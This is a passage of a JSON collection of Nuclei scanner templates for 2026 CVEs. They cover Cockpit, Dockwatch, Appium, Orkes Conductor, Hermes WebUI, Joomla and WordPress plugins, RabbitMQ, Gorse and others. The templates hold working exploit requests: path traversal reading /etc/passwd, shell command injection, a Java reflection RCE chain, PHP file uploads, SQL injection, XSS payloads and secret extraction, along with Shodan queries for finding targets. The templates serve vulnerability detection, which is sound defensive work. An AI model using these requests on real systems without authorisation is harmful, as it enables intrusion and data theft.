attacker can read sensitive system files (e.g., /etc/passwd), leading to potential credential exposure or further system compromise.\n  remediation: |\n    Upgrade to Cockpit CMS version 2.14.1 or higher.\n  reference:\n    - https://www.cve.org/CVERecord?id=CVE-2026-58467\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-58467\n    - https://github.com/cockpit-hq/cockpit/compare/2.14.0...2.14.1\n    - https://github.com/geo-chen/oss/blob/main/cockpit.md\n  classification:\n    cvss-metrics: CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N\n    cvss-score: 8.2\n    cve-id: CVE-2026-58467\n    epss-score: 0.00522\n    epss-percentile: 0.43305\n    cwe-id: CWE-22\n  metadata:\n    verified: false\n    max-request: 1\n    vendor: cockpit-hq\n    product: cockpit\n    shodan-query: 'http.favicon.hash:\"688609340\"'\n    fofa-query: 'icon_hash==\"688609340\"'\n  tags: cve,cve2026,cockpit,cms,lfi,traversal\n\nhttp:\n  - raw:\n      - |\n        GET /:x/storage/../../../../../../etc/passwd HTTP/1.1\n        Host: {{Hostname}}\n\n    matchers-condition: and\n    matchers:\n      - type: regex\n        part: body\n        regex:\n          - \"root:.*:0:0:\"\n\n      - type: status\n        status:\n          - 200\n# digest: 490a0046304402203f66d2f56720eed3b60034c23a7ebdf0a87b25bcd1895effd3d0d4b1efc1b77b022061ed944ae00191d6c5cd44815791f2a9660000aee8af8ba0ecc0568ab7d33b0b:922c64590222798bb761d5b6d8e72950","severity":"high","template_path":"http/cves/2026/CVE-2026-58467.yaml","vuln_id":"cve-2026-58467"},{"raw":"id: CVE-2026-58455\n\ninfo:\n  name: Dockwatch <= 0.6.567 - OS Command Injection\n  author: DhiyaneshDk\n  severity: critical\n  description: |\n    Dockwatch through 0.6.567 contains an unauthenticated command injection caused by missing exit() after authentication redirect in loader.php and unsanitized input in ajax/compose.php, letting remote attackers execute arbitrary shell commands, exploit requires seeding a session flag via incomplete auth check.\n  impact: |\n    Remote attackers can execute arbitrary shell commands, potentially leading to full host compromise.\n  remediation: |\n    Update to the latest version that fixes the authentication and input validation issues.\n  reference:\n    - https://github.com/Notifiarr/dockwatch/pull/135\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-58455\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 9.8\n    cve-id: CVE-2026-58455\n    cwe-id: CWE-78\n    epss-score: 0.0804\n    epss-percentile: 0.94529\n  metadata:\n    max-request: 2\n    vendor: notifiarr\n    product: dockwatch\n    shodan-query: title:\"Dockwatch\"\n  tags: cve,cve2026,dockwatch,rce,vkev\n\nflow: http(1) && http(2)\n\nvariables:\n  cmd: \"echo CVE-2026-58455 | rev\"\n\nhttp:\n  - raw:\n      - |\n        GET / HTTP/1.1\n        Host: {{Hostname}}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 200'\n          - 'contains(body, \"Dockwatch\")'\n        condition: and\n        internal: true\n\n  - raw:\n      - |\n        POST /ajax/compose.php HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/x-www-form-urlencoded\n\n        m=composePull&composePath=x;{{cmd}};#\n\n    matchers:\n      - type: word\n        part: body\n        words:\n          - '55845-2602-EVC'\n# digest: 4b0a00483046022100d79deb360fcbfdceffa4d98281770b9ffc4e36cc2efce221125de7271363136d022100e62ed89819ca087856df86057ab064206cdc758f0480a16f23a509d68de5a477:922c64590222798bb761d5b6d8e72950","severity":"critical","template_path":"http/cves/2026/CVE-2026-58455.yaml","vuln_id":"cve-2026-58455"},{"raw":"id: CVE-2026-58191\n\ninfo:\n  name: Appium base-driver <=10.6.0 - Reflected Cross-Site Scripting\n  author: str4k3r\n  severity: medium\n  description: |\n    Appium <= 10.7.0 contains a reflected XSS caused by unescaped reflection of throwError query parameter, comments POST field, and User-Agent header in base-driver routes, letting remote attackers execute arbitrary JavaScript, exploit requires crafted HTTP requests.\n  impact: |\n    Remote attackers can execute arbitrary JavaScript on the server origin, potentially leading to session hijacking or further attacks.\n  remediation: |\n    Update to version 10.7.0 or later.\n  reference:\n    - https://github.com/appium/appium/security/advisories/GHSA-3wgp-x9p5-c7cc\n    - https://github.com/appium/appium/commit/d94a40af9f8040191ee7888571a1c9d5aec59f89\n    - https://github.com/appium/appium/releases/tag/@appium/base-driver@10.7.0\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-58191\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N\n    cvss-score: 6.5\n    cve-id: CVE-2026-58191\n    epss-score: 0.00441\n    epss-percentile: 0.37746\n    cwe-id: CWE-79\n  metadata:\n    verified: true\n    max-request: 1\n    vendor: appium\n    product: appium\n    shodan-query: 'http.favicon.hash:-144749386'\n    fofa-query: 'icon_hash=\"-144749386\"'\n  tags: cve,cve2026,appium,xss,base-driver,node\n\nhttp:\n  - raw:\n      - |\n        GET /test/guinea-pig?throwError=%27%2balert(document.domain)%2b%27 HTTP/1.1\n        Host: {{Hostname}}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 200'\n          - 'contains(body, \"alert(document.domain)\")'\n          - 'contains_all(body, \"This page is a Selenium sandbox\", \"Appium\")'\n        condition: and\n# digest: 490a00463044022075245c95322cc877b948c2fbede1d6637145893bc9f8eb02f425016ab389364302201c92785f5e3dc476b114970166b7c7dad117c6a28020e01ae486cee3a821361a:922c64590222798bb761d5b6d8e72950","severity":"medium","template_path":"http/cves/2026/CVE-2026-58191.yaml","vuln_id":"cve-2026-58191"},{"raw":"id: CVE-2026-58138\n\ninfo:\n  name: Orkes Conductor 3.21.21-3.30.1 - Remote Code Execution\n  author: aryu-ru\n  severity: critical\n  description: |\n    Orkes Conductor from 3.21.21 before 3.30.2 is vulnerable to unauthenticated remote code execution. The INLINE workflow task evaluates a user-supplied JavaScript expression in a GraalVM context created with HostAccess.ALL, so an unauthenticated attacker can reflect from the bound input object to java.lang.Runtime and execute arbitrary operating system commands through the workflow API.\n  impact: |\n    A remote, unauthenticated attacker can execute arbitrary operating system commands on the Conductor server.\n  remediation: |\n    Upgrade to Orkes Conductor 3.30.2 or later, which disables host class loading in the script evaluators.\n  reference:\n    - https://www.vulncheck.com/advisories/orkes-conductor-unauthenticated-rce-via-graalvm-script-evaluators\n    - https://github.com/conductor-oss/conductor/commit/c691e35e768caeb802c9f06ecdd9674c80081af1\n    - https://github.com/conductor-oss/conductor/releases/tag/v3.30.2\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-58138\n    - https://github.com/BiiTts/CVE-2026-58138-Conductor-Unauth-RCE\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 9.8\n    cve-id: CVE-2026-58138\n    epss-score: 0.09257\n    epss-percentile: 0.95128\n    cwe-id: CWE-94\n  metadata:\n    verified: true\n    max-request: 3\n    vendor: conductor-oss\n    product: conductor\n    shodan-query: http.title:\"Conductor UI\"\n  tags: cve,cve2026,conductor,graalvm,rce,intrusive,vkev\n\nvariables:\n  wfname: \"{{rand_text_alpha(12)}}\"\n  marker: \"{{rand_text_alphanumeric(8)}}\"\n\nflow: http(1) && http(2) && http(3)\n\nhttp:\n  - raw:\n      - |\n        POST /api/metadata/workflow HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/json\n\n        {\"name\": \"{{wfname}}\", \"version\": 1, \"schemaVersion\": 2, \"ownerEmail\": \"test@test.com\", \"tasks\": [{\"name\": \"n\", \"taskReferenceName\": \"n\", \"type\": \"INLINE\", \"inputParameters\": {\"evaluatorType\": \"javascript\", \"expression\": \"var k=$.getClass().getClass();var S=k.getMethod('getName').getReturnType();var forName=k.getMethod('forName',S);var L=function(n){return forName.invoke(null,[n]);};var RT=L('java.lang.Runtime');var rt=RT.getMethod('getRuntime').invoke(null,[]);var I=L('java.lang.Integer').getField('TYPE').get(null);var A=L('java.lang.reflect.Array');var arr=A.getMethod('newInstance',k,I).invoke(null,[S,3]);var set=A.getMethod('set',L('java.lang.Object'),I,L('java.lang.Object'));set.invoke(null,[arr,0,'sh']);set.invoke(null,[arr,1,'-c']);set.invoke(null,[arr,2,'echo {{marker}}-$((6*7))']);var p=RT.getMethod('exec',arr.getClass()).invoke(rt,[arr]);p.waitFor();var isr=L('java.io.InputStreamReader').getConstructor(L('java.io.InputStream')).newInstance(p.getInputStream());var br=L('java.io.BufferedReader').getConstructor(L('java.io.Reader')).newInstance(isr);var o='',l;while((l=br.readLine())!==null)o+=l+'\\\\n';o\"} }]}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - \"status_code == 200\"\n        internal: true\n\n  - raw:\n      - |\n        POST /api/workflow/{{wfname}} HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/json\n\n        {}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - \"status_code == 200\"\n        internal: true\n\n    extractors:\n      - type: regex\n        name: wfid\n        internal: true\n        group: 1\n        regex:\n          - \"([0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12})\"\n\n  - raw:\n      - |\n        GET /api/workflow/{{wfid}}?includeTasks=true HTTP/1.1\n        Host: {{Hostname}}\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        part: body\n        words:\n          - \"{{marker}}-42\"\n\n      - type: word\n        part: content_type\n        words:\n          - application/json\n\n      - type: status\n        status:\n          - 200\n# digest: 490a00463044022065e05c267c85b78d8c5c8bc9db5d7103e02e155ca76bd1ed4ef2d76fafac001f022016413cf750b03c84058f81e56a95077da4886295be6681a50baafe065c970ece:922c64590222798bb761d5b6d8e72950","severity":"critical","template_path":"http/cves/2026/CVE-2026-58138.yaml","vuln_id":"cve-2026-58138"},{"raw":"id: CVE-2026-58123\n\ninfo:\n  name: Hermes WebUI < 0.51.788 - Remote Code Execution\n  author: str4k3r\n  severity: critical\n  description: |\n    Hermes WebUI < 0.51.788 contains an unauthenticated remote code execution caused by improper access control in embedded terminal API endpoints, letting remote attackers execute arbitrary shell commands without credentials.\n  impact: |\n    Remote attackers can execute arbitrary shell commands as the server process user, leading to full system compromise.\n  remediation: |\n    Update to version 0.51.788 or later.\n  reference:\n    - https://www.vulncheck.com/advisories/hermes-webui-unauthenticated-rce-via-terminal-api\n    - https://github.com/nesquena/hermes-webui/commit/d257e5f36cfa9328600c8bde6f0de09a6ad9b6f4\n    - https://github.com/nesquena/hermes-webui/releases/tag/v0.51.788\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-58123\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 9.8\n    cve-id: CVE-2026-58123\n    epss-score: 0.04649\n    epss-percentile: 0.91321\n    cwe-id: CWE-306\n  metadata:\n    verified: true\n    max-request: 3\n    vendor: nesquena\n    product: hermes-webui\n  tags: cve,cve2026,hermes-webui,rce,terminal,unauth,oast\n\nflow: http(1) && http(2) && http(3)\n\nhttp:\n  - raw:\n      - |\n        POST /api/session/new HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/json\n\n        {}\n\n    matchers:\n      - type: status\n        status:\n          - 200\n        internal: true\n\n    extractors:\n      - type: regex\n        name: session_id\n        part: body\n        group: 1\n        internal: true\n        regex:\n          - '\"session_id\"\\s*:\\s*\"([a-f0-9]{12})\"'\n\n  - raw:\n      - |\n        POST /api/terminal/start HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/json\n\n        {\"session_id\":\"{{session_id}}\"}\n\n    matchers:\n      - type: status\n        status:\n          - 200\n        internal: true\n\n  - raw:\n      - |\n        POST /api/terminal/input HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/json\n\n        {\"session_id\":\"{{session_id}}\",\"data\":\"python3 -c \\\"import socket; socket.gethostbyname('{{interactsh-url}}')\\\"\\n\"}\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        part: interactsh_protocol\n        words:\n          - \"dns\"\n\n      - type: status\n        status:\n          - 200\n# digest: 4a0a00473045022100b3b49f5354e57d2e6b4dcbe1b6320df070018cfeb678e9bb05b2e635f9ff9ad302200cca2bd88f7be046786218a79cda7d18310ac6164157b41f99358cea84393f89:922c64590222798bb761d5b6d8e72950","severity":"critical","template_path":"http/cves/2026/CVE-2026-58123.yaml","vuln_id":"cve-2026-58123"},{"raw":"id: CVE-2026-57827\n\ninfo:\n  name: RSFiles! for Joomla - Arbitrary File Upload\n  author: omarkurt\n  severity: critical\n  description: |\n    RSFiles! (com_rsfiles) for Joomla < 1.17.12 allows unauthenticated arbitrary file upload via the rsfiles.upload task. The write method performs no authentication, CSRF token, or file extension checks, allowing upload of executable PHP files to the web-accessible downloads/ directory.\n  impact: |\n    Unauthenticated remote code execution via PHP webshell upload.\n  remediation: |\n    Update RSFiles! to version 1.17.12 or later.\n  reference:\n    - https://mysites.guru/blog/rsfiles-unauthenticated-file-upload-rce/\n    - https://vulnerabletarget.com/VT-2026-57827\n    - https://www.rsjoomla.com/blog/view/644-unauthenticated-file-upload-fixed-in-rsfiles-version-11712-update-now.html\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-57827\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 9.8\n    cve-id: CVE-2026-57827\n    epss-score: 0.02328\n    epss-percentile: 0.82766\n    cwe-id: CWE-434\n  metadata:\n    verified: true\n    max-request: 3\n    vendor: rsjoomla\n    product: rsfiles\n    framework: joomla\n    shodan-query: http.html:\"com_rsfiles\"\n    fofa-query: body=\"com_rsfiles\"\n  tags: cve,cve2026,joomla,rsjoomla,rsfiles,file-upload,rce,intrusive\n\nvariables:\n  marker: \"{{to_lower(rand_text_alpha(8))}}\"\n\nflow: http(1) && http(2) && http(3)\n\nhttp:\n  - raw:\n      - |\n        POST /index.php?option=com_rsfiles&task=rsfiles.checkupload HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/x-www-form-urlencoded\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 200'\n          - 'contains(body, \"\\\"status\\\":\\\"ok\\\"\")'\n        condition: and\n        internal: true\n\n  - raw:\n      - |\n        POST /index.php?option=com_rsfiles&task=rsfiles.upload HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: multipart/form-data; boundary=----RSFilesBoundary57827\n\n        ------RSFilesBoundary57827\n        Content-Disposition: form-data; name=\"file\"; filename=\"{{marker}}.php\"\n        Content-Type: application/x-php\n\n        <?php echo 'VT-2026-57827-{{marker}}'; ?>\n        ------RSFilesBoundary57827--\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 200'\n          - 'contains(body, \"\\\"status\\\":\\\"success\\\"\")'\n        condition: and\n        internal: true\n\n  - raw:\n      - |\n        GET /downloads/{{marker}}.php HTTP/1.1\n        Host: {{Hostname}}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 200'\n          - \"contains(body, 'VT-2026-57827-{{marker}}')\"\n        condition: and\n# digest: 490a0046304402204e51a56e6e98149c89e3461c3d3ac5862ab0a5c1e03ac520f8c01510c4ebf27902200ffd8f1cc0038722d1a93896951dcc000faa7d2dedc7a8c723c70777ea755782:922c64590222798bb761d5b6d8e72950","severity":"critical","template_path":"http/cves/2026/CVE-2026-57827.yaml","vuln_id":"cve-2026-57827"},{"raw":"id: CVE-2026-57582\n\ninfo:\n  name: GeoNetwork - Reflected Cross-Site Scripting\n  author: DhiyaneshDk\n  severity: high\n  description: |\n    GeoNetwork versions 4.4.5 through 4.4.11 are vulnerable to reflected cross-site scripting (XSS) in the public unauthenticated catalog search functionality. The uiconfig query parameter of the catalog.search endpoint is reflected into a JavaScript context without sufficient sanitization, allowing arbitrary JavaScript execution in a victim's browser.\n  impact: |\n    An unauthenticated attacker can craft a malicious URL that executes arbitrar JavaScript when opened by a victim. If a privileged GeoNetwork user such as an administrator visits the URL, the attacker may perform actions within the security context of that user.\n  remediation: |\n    Upgrade GeoNetwork to version 4.4.12 or later.\n  reference:\n    - https://github.com/geonetwork/core-geonetwork/security/advisories/GHSA-5pq9-ppfw-p83j\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N\n    cvss-score: 8.2\n    cve-id: CVE-2026-57582\n    cwe-id: CWE-79\n  metadata:\n    verified: true\n    max-request: 1\n    vendor: geonetwork\n    product: core-geonetwork\n    framework: java\n    shodan-query: html:\"/srv/eng/\"\n  tags: cve,cve2026,geonetwork,xss\n\nhttp:\n  - method: GET\n    path:\n      - \"{{BaseURL}}/srv/eng/catalog.search?uiconfig=%28alert%281%29%2C%7B%7D%29\"\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        part: body\n        words:\n          - \"(alert(1),{})\"\n          - \"GnCatController\"\n        condition: and\n\n      - type: word\n        part: header\n        words:\n          - \"text/html\"\n        case-insensitive: true\n# digest: 4a0a00473045022100f3bc6ae228b557059dc9b89c121c58e4c2ce015d2e9f29f2f6e0f0b80809c95c02206d47dac07d7030f07779c67935789ee18d9af0344bda0fb24510e6275f6345d1:922c64590222798bb761d5b6d8e72950","severity":"high","template_path":"http/cves/2026/CVE-2026-57582.yaml","vuln_id":"cve-2026-57582"},{"raw":"id: CVE-2026-57219\n\ninfo:\n  name: RabbitMQ Management - OAuth 2 Client Secret Disclosure\n  author: aryu-ru\n  severity: high\n  description: |\n    RabbitMQ < 3.13.15, 4.0.20, 4.1.11, and 4.2.6 contains an information disclosure caused by the obsolete GET /api/auth endpoint exposing OAuth 2 client secrets when management.oauth_client_secret is configured, letting unauthenticated attackers access sensitive credentials, exploit requires management plugin and OAuth configuration enabled.\n  impact: |\n    Unauthenticated attackers can access OAuth 2 client secrets, leading to credential exposure and potential unauthorized access.\n  remediation: |\n    Update to versions 3.13.15, 4.0.20, 4.1.11, or 4.2.6 or later.\n  reference:\n    - https://github.com/rabbitmq/rabbitmq-server/security/advisories/GHSA-pj24-8j6m-vq9q\n    - https://github.com/rabbitmq/rabbitmq-server/commit/98b1daf740237c85941e8addcbea6e74f4a2743c\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-57219\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n    cvss-score: 7.5\n    cve-id: CVE-2026-57219\n    epss-score: 0.01988\n    epss-percentile: 0.79731\n    cwe-id: CWE-522\n  metadata:\n    verified: true\n    max-request: 1\n    vendor: broadcom\n    product: rabbitmq_server\n    shodan-query: http.title:\"RabbitMQ Management\"\n    fofa-query: title=\"RabbitMQ Management\"\n  tags: cve,cve2026,rabbitmq,broadcom,oauth,exposure,unauth\n\nhttp:\n  - raw:\n      - |\n        GET /api/auth HTTP/1.1\n        Host: {{Hostname}}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - status_code == 200\n          - contains(content_type, \"application/json\")\n          - contains_all(body, \"oauth_enabled\", \"oauth_client_secret\")\n        condition: and\n\n    extractors:\n      - type: json\n        part: body\n        json:\n          - '.oauth_client_secret'\n# digest: 4b0a00483046022100c173e4c803e1d8ba89c613a05ca14908ed319e1881e986baf4484f6be345cdf602210096364f8e9169b7a0dfe1cdb4a64814318975b6e93889e6492f200622bf202476:922c64590222798bb761d5b6d8e72950","severity":"high","template_path":"http/cves/2026/CVE-2026-57219.yaml","vuln_id":"cve-2026-57219"},{"raw":"id: CVE-2026-5718\n\ninfo:\n  name: Drag and Drop Multiple File Upload - CF7 <= 1.3.9.6 - Remote Code Execution\n  author: zer0p0int\n  severity: critical\n  description: |\n   Drag and Drop Multiple File Upload for Contact Form 7 WordPress plugin <= 1.3.9.6 contains an unrestricted file upload caused by insufficient file type validation and bypass of filename sanitization with non-ASCII characters, letting unauthenticated attackers upload arbitrary files and achieve remote code execution.\n  impact: |\n   Unauthenticated attackers can upload arbitrary files, potentially leading to remote code execution and full server compromise.\n  remediation: |\n   Update to the latest version beyond 1.3.9.6.\n  reference:\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-5718\n    - https://wordpress.org/plugins/drag-and-drop-multiple-file-upload-contact-form-7/\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 9.8\n    cve-id: CVE-2026-5718\n    epss-score: 0.04175\n    epss-percentile: 0.90457\n    cwe-id: CWE-434\n  metadata:\n    verified: true\n    max-request: 5\n    vendor: codedropz\n    product: drag-and-drop-multiple-file-upload-contact-form-7\n    publicwww-query: \"/wp-content/plugins/drag-and-drop-multiple-file-upload-contact-form-7/\"\n  tags: cve,cve2026,wordpress,wp-plugin,file-upload,rce,intrusive,unauth,vkev\n\nvariables:\n  string: \"{{randstr}}\"\n  filename: \"{{to_lower(rand_text_alpha(6))}}\"\n\nflow: http(1) && http(2) && http(3) && http(4)\n\nhttp:\n  - method: GET\n    path:\n      - \"{{BaseURL}}/\"\n      - \"{{BaseURL}}/contact\"\n      - \"{{BaseURL}}/contact-us\"\n\n    stop-at-first-match: true\n    host-redirects: true\n    max-redirects: 2\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 200'\n          - 'contains(body, \"_wpcf7\")'\n        internal: true\n        condition: and\n\n    extractors:\n      - type: regex\n        name: form_id\n        group: 1\n        part: body\n        regex:\n          - '_wpcf7\"(?:[^>]*value=\"|:)(\\d+)'\n        internal: true\n\n  - raw:\n      - |\n        POST /wp-admin/admin-ajax.php HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/x-www-form-urlencoded\n\n        action=_wpcf7_check_nonce\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 200'\n          - 'contains(body, \"\\\"data\\\"\")'\n        internal: true\n        condition: and\n\n    extractors:\n      - type: regex\n        name: nonce\n        group: 1\n        part: body\n        regex:\n          - '\"data\":\"([a-f0-9]+)\"'\n        internal: true\n\n  - raw:\n      - |\n        POST /wp-admin/admin-ajax.php HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: multipart/form-data; boundary=---------------------------cf7dndboundary\n\n        -----------------------------cf7dndboundary\n        Content-Disposition: form-data; name=\"action\"\n\n        dnd_codedropz_upload\n        -----------------------------cf7dndboundary\n        Content-Disposition: form-data; name=\"security\"\n\n        {{nonce}}\n        -----------------------------cf7dndboundary\n        Content-Disposition: form-data; name=\"form_id\"\n\n        {{form_id}}\n        -----------------------------cf7dndboundary\n        Content-Disposition: form-data; name=\"upload_name\"\n\n        upload-file\n        -----------------------------cf7dndboundary\n        Content-Disposition: form-data; name=\"upload-file\"; filename=\"{{filename}}.php\"\n        Content-Type: application/octet-stream\n\n        {{string}}\n        -----------------------------cf7dndboundary--\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 200'\n          - 'contains_all(body, \"\\\"success\\\":true\", \"\\\"file\\\"\")'\n        internal: true\n        condition: and\n\n    extractors:\n      - type: regex\n        name: renamed\n        group: 1\n        part: body\n        regex:\n          - '\"file\":\"([^\"]+)\"'\n        internal: true\n\n      - type: regex\n        name: path\n        group: 1\n        part: body\n        regex:\n          - '\"path\":\"([^\"]+)\"'\n        internal: true\n\n  - method: GET\n    path:\n      - \"{{BaseURL}}/wp-content/uploads/wp_dndcf7_uploads/{{path}}/{{renamed}}\"\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 200'\n          - 'contains(body, string)'\n        condition: and\n# digest: 4a0a00473045022047be144e4bdeef7e04aae22eef73baa8a197dd2e1e44a4045f35d9671656bd7d022100f0414c21bcfb5537580996db32c97cb10387ed6bb24c729c788308501b4d9346:922c64590222798bb761d5b6d8e72950","severity":"critical","template_path":"http/cves/2026/CVE-2026-5718.yaml","vuln_id":"cve-2026-5718"},{"raw":"id: CVE-2026-56782\n\ninfo:\n  name: Gorse < 0.5.10 - Unauthenticated Database Dump\n  author: 0x_Akoko\n  severity: critical\n  description: |\n    Gorse < 0.5.10 contains an authentication bypass caused by empty admin_api_key in /api/dump and /api/restore endpoints, letting unauthenticated remote attackers access and modify protected data, exploit requires default empty admin_api_key configuration.\n  impact: |\n    Remote attackers can exfiltrate or overwrite the entire database including sensitive user data without authentication.\n  remediation: |\n    Update to version 0.5.10 or later.\n  reference:\n    - https://github.com/gorse-io/gorse/issues/1292\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-56782\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 9.8\n    cve-id: CVE-2026-56782\n    epss-score: 0.03559\n    epss-percentile: 0.88811\n    cwe-id: CWE-306\n  metadata:\n    max-request: 2\n    verified: true\n    vendor: gorse-io\n    product: gorse\n    fofa-query: title=\"Gorse Dashboard\"\n  tags: cve,cve2026,gorse,unauth,exposure,misconfig\n\nflow: http(1) && http(2)\n\nhttp:\n  - raw:\n      - |\n        GET / HTTP/1.1\n        Host: {{Hostname}}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - status_code == 200\n          - contains(tolower(body), \"gorse\")\n        condition: and\n        internal: true\n\n  - raw:\n      - |\n        GET /api/dump HTTP/1.1\n        Host: {{Hostname}}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - status_code == 200\n          - contains(content_type, \"application/octet-stream\")\n          - \"!contains(body, 'unauthorized')\"\n        condition: and\n# digest: 4b0a00483046022100bbaa58d7426e6c15a9a777c03ddc32806652bac47798437b00dcb91d099671be022100bbfcf9dd7e40e4fc74c779899b5974c791c7e9ec703ce0cb5ca944c8cd553e50:922c64590222798bb761d5b6d8e72950","severity":"critical","template_path":"http/cves/2026/CVE-2026-56782.yaml","vuln_id":"cve-2026-56782"},{"raw":"id: CVE-2026-56292\n\ninfo:\n  name: AcyMailing < 10.11.1 - Unauthenticated SQL Injection\n  author: str4k3r\n  severity: critical\n  description: |\n    AcyMailing component for Joomla <10.11.1 contains a sql injection caused by improper input sanitization, letting attackers access unauthorized database data, exploit requires crafted input.\n  impact: |\n    Attackers can access and leak unauthorized database information, compromising data confidentiality.\n  remediation: |\n    Upgrade to version 10.11.1 or later.\n  reference:\n    - https://mysites.guru/blog/acymailing-sql-injection-disclosure/\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-56292\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n    cvss-score: 7.5\n    cve-id: CVE-2026-56292\n    epss-score: 0.01381\n    epss-percentile: 0.70925\n    cwe-id: CWE-89\n  metadata:\n    verified: true\n    max-request: 1\n    vendor: acyba\n    product: acymailing\n    shodan-query: http.html:\"com_acym\"\n    fofa-query: body=\"com_acym\" || body=\"acymailing\"\n  tags: cve,cve2026,acymailing,joomla,wordpress,sqli,unauth\n\nhttp:\n  - raw:\n      - |\n        GET /index.php?option=com_acym&tmpl=component&ctrl=frontentityselect&task=loadEntityFront&offset=0&perCalls=500&entity=list&join&columns=id%2Cname&join_table=1%2CCONCAT%280x41435953%2CVERSION%28%29%2C0x454E4453%29%20AS%20acym_sqli HTTP/1.1\n        Host: {{Hostname}}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 200'\n          - 'contains_all(body, \"ACYS\", \"ENDS\", \"acym_sqli\")'\n        condition: and\n\n    extractors:\n      - type: regex\n        group: 1\n        regex:\n          - 'ACYS([0-9]+\\.[0-9]+\\.[0-9]+[^E]*)ENDS'\n# digest: 4a0a004730450220439c5fd07c2ca6414cab9cb49d074bbb8eff922556abcd90d296d29973a24c0e022100a24db7ed5acea563005fc351bbc04428f31d030db76aac4d09abef7661a2448b:922c64590222798bb761d5b6d8e72950","severity":"critical","template_path":"http/cves/2026/CVE-2026-56292.yaml","vuln_id":"cve-2026-56292"},{"raw":"id: CVE-2026-56291\n\ninfo:\n  name: Balbooa Forms < 2.4.1 - Unauthenticated Arbitrary File Upload\n  author: Nick Vidovic,0x_Akoko\n  severity: critical\n  description: |\n    Joomla Balbooa Forms contains an unrestricted file upload vulnerability caused by lack of authentication checks, letting unauthenticated attackers upload executable files and achieve remote code execution.\n  impact: |\n    Unauthenticated attackers can upload executable files, leading to full remote code execution and complete system compromise.\n  remediation: |\n    Update to the latest version of Balbooa Forms extension.\n  reference:\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-56291\n    - https://www.cisa.gov/known-exploited-vulnerabilities-catalog\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 9.8\n    cve-id: CVE-2026-56291\n    epss-score: 0.14854\n    epss-percentile: 0.96539\n    cwe-id: CWE-434\n  metadata:\n    verified: false\n    max-request: 1\n    vendor: balbooa\n    product: forms\n    framework: joomla\n    fofa-query: body=\"com_baforms\"\n  tags: cve,cve2026,joomla,balbooa,baforms,file-upload,rce,vuln,kev,vkev\n\nvariables:\n  marker: \"{{to_lower(rand_base(8))}}\"\n\nflow: http(1) && http(2)\n\nhttp:\n  - raw:\n      - |\n        POST /index.php?option=com_baforms&task=form.uploadAttachmentFile&form_id=1 HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: multipart/form-data; boundary=----WebKitFormBoundary\n\n        ------WebKitFormBoundary\n        Content-Disposition: form-data; name=\"form_id\"\n\n        1\n        ------WebKitFormBoundary\n        Content-Disposition: form-data; name=\"file\"; filename=\"{{marker}}.txt\"\n        Content-Type: text/plain\n\n        CVE-2026-56291-{{marker}}\n        ------WebKitFormBoundary--\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 